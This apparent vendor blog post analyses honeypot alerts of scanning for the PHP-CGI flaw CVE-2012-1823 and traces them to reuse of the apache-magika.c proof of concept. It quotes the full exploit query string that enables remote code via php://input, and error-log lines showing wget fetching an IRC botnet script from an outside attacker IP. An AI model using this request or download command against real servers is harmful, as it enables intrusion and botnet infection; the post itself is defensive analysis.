[Honeypot Alert] More PHP-CGI Scanning (apache-magika.c)

In the past 24 hours, one of the WASC Distributed Web Honeypot participant's sensors picked up continued scanning for CVE-2012-1823 which is a vulnerability within PHP-CGI. Here is a screenshot taken from the ModSecurity WAF alert data:

PHP-CGI Attack

The URLs searched for are the following:

• /cgi-bin/php
• /cgi-bin/php4
• /cgi-bin/php5
• /cgi-bin/php.cgi
• /cgi-bin/php-cgi

By decoding the URL line of the request, we can see evidence of the PHP-CGI attack vector:

POST /cgi-bin/php4?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1

The bolded/highlighted section of data will be erroneously passed to the PHP command line interpreter and may allow the attacker to override specific PHP configurations. In this case, one of the key modifications is to specify "auto_prepend_file=php://input" which will allow the attacker to send PHP code in the request body. If we inspect the request body contents, we can see that the attacker is attempting to use various command-line web clients (wget/curl/fetch/lwp-get, etc...) to download the "mc.pl" script on the remote attacker's site. The "mc.pl" file is no longer available at that URL, however, Google cache shows the contents as an IRC botnet client.

apache-magika.c PoC Code Reuse

By examining multiple alerts that came in from 4 distinct GeoLocations (Vietnam, India, China, and the US), we can conclude that a single attacker has modified the apache-magika.c PoC exploit code release by Kingcope. We can confirm the use of the apache-magika.c PoC code due to the exact same request headers (order and content).

• Host:
• User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
• Content-Type: application/x-www-form-urlencoded
• Content-Length:
• Connection: close

Additionally, we know that this is the same attacker (regardless of the source IP/GeoLocation) data due to the use of the exact same, unique POST payload referencing the "mc.pl file on the 164.177.157.215 host.

Recommendations

• Upgrade PHP to the latest version.
• Deploy a WAF to mitigate the vulnerability until you can upgrade and identify/prevent attacks. Both Trustwave WAFs can identify these attacks:
  • WebDefend
  • ModSecurity
• Review Apache Error Logs for signs of compromise. The following entries indicate exploit attempts and failure messages of the OS command line web clients:

[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] sh: line 1: 16726 Terminated wget http://164.177.157.215/drupal/themes/bartik/images/log/-log/mc . pl[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] sh: curl: command not found[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] sh: fetch: command not found[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] sh: lwp-get: command not found[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory